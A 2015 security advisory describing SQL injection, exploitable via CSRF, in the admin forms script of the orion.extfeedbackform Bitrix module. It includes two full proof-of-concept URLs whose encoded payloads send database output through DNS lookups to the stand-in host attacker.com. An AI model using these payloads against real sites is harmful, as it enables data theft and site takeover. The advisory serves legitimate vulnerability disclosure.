SQL Injection in orion.extfeedbackform Bitrix Module

2015-11-18T00:00:00
ID HTB23280
Type htbridge
Reporter High-Tech Bridge
Modified 2015-11-18T00:00:00

Description

High-Tech Bridge Security Research Lab discovered two vulnerabilities in orion.extfeedbackform Bitrix module, can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website.

All discovered vulnerabilities require that the attacker is authorized against the website and has access to vulnerable module. However the vulnerabilities can be also exploited via CSRF, since the web application does not check origin of received requests. This means, that a remote anonymous attacker can create a page with CSRF exploit, trick victim to visit this page and execute arbitrary SQL queries in database of vulnerable website.

The vulnerability exists due to insufficient filtration of input data passed via the "order" and "by" HTTP GET parameters to "/bitrix/admin/orion.extfeedbackform_efbf_forms.php" script. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

Below are two exploits for each vulnerable parameter. They are based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for version() (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker).

"order":

http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?by=ID,%28sel ect%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29, %28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28 116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29, CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29, CHAR%28111%29,CHAR%28109%29,CHAR%2892%29, CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29, CHAR%28114%29%29%29%29+--+

"by":

http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?order=%28sel ect%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29, %28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28 116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29, CHAR%28101%29,CHAR%28114%29,CHAR%2846%29, CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29, CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29, CHAR%28114%29%29%29%29+--+